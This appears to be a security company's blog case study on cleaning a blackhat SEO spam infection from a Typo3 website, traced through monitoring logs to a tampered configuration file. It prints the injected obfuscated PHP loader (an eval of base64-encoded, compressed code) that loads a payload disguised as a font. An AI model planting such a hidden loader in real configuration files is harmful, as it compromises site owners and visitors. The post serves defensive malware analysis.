Here at Sucuri most of the malware that we deal with is on CMS platforms like:
- and others.
But every now and then we come across something a little different.
Blackhat SEO Infection in Typo3
Just recently, I discovered a website using the Typo3 CMS that had been infected with a blackhat SEO spam infection:
Before I begin, according to websitesetup.org, Typo3 is currently the 8th most widely used CMS platform on the web, so I’m surprised I had never seen an infection with this software before, but it looks like over half a million websites on the web use Typo3.
Starting the Typo3 Website Clean up Process
When you work with the same CMS platforms every day you know where to look right away to spot problems (core or template files in WordPress/Joomla or core_config_data or cms_block database tables in Magento etc).
So when I came across this case, I wasn’t sure quite where to start. That’s why I think this is a really great case study, especially for those of you who may find yourself with a hacked website and not really sure what to do next.
The spam displayed on the website was only being served to search engine user agents like Googlebot which is extremely common for these black hat SEO infections.
Normal (human) visitors to the site will see a normal page, but when search engines crawl a web page they index links to spammy websites and take them into account when calculating ratings of web pages they link to.
1 – Searching the File System
I started by searching the file system for “Google” to see if I could pinpoint any piece of code that might be an obvious conditional infection, but alas, the attackers were not this lazy.
Then I searched for a few other terms but was met with just a bunch of noise.
2 – Checking the Logs
One really important aspect of website security is monitoring and logging.
Since this site was under our monitoring I could tell that something must have changed on this website in the last week or so to cause the issue:
My next step was to check our website monitor logs for any recently modified files that might lead me somewhere. There’s a great post on the importance of those logs that you can read here.
2018-10-08 10:02:56 www.***********.com: Warning: File modified: ./typo3conf/LocalConfiguration.php (old size: 6067, new size: 6309).
Seems a configuration file for the CMS had been modified recently and around the same time that the warning was issued. Let’s take a look!
Step 3 – Verifying the Typo3 Configuration File
I found the following code inserted at the top of the file:
<?php eval(gzinflate(base64_ decode('y8xLzilNSY3Pz0tOVVDX00 /LzElNTMnNzNNPyknRT8vPKynWL0jXKy5LV7cGAA==')));
So I think we found our culprit!
The Spam Infection in Typo3
Let’s take a closer look at the infection. One of my favorite tools to use is this online PHP sandbox. All we have to do here is replace eval with echo and we get this:
Let’s take a look inside that file (content redacted):
That doesn’t look like any font or an image I’ve ever seen. It looks like we just found ourselves the payload of the infection. A fake “font” being loaded through the configuration file of the CMS.
The PHP code itself used a few different obfuscation techniques, but in the end, it was the same old blackhat SEO spam that we always see affecting websites.
Interestingly, when I checked out the detected modified file, the last modified date appears to have been tampered with:
Usually, the attackers do their best to hide their activities. It’s actually very common to see last modified dates being tampered with. As you can see, this infection shows that this method is being used in the wild.
In the final analysis, this case shows that you don’t need to be a security guru or have expert-level knowledge of CMS platforms to know how they work to clean a site.
You just need to be grounded in some basic security fundamentals, have access to your logs, and not trust all files you see!
If you want to learn more about how to clean a website, we have written a DIY guide that can help you.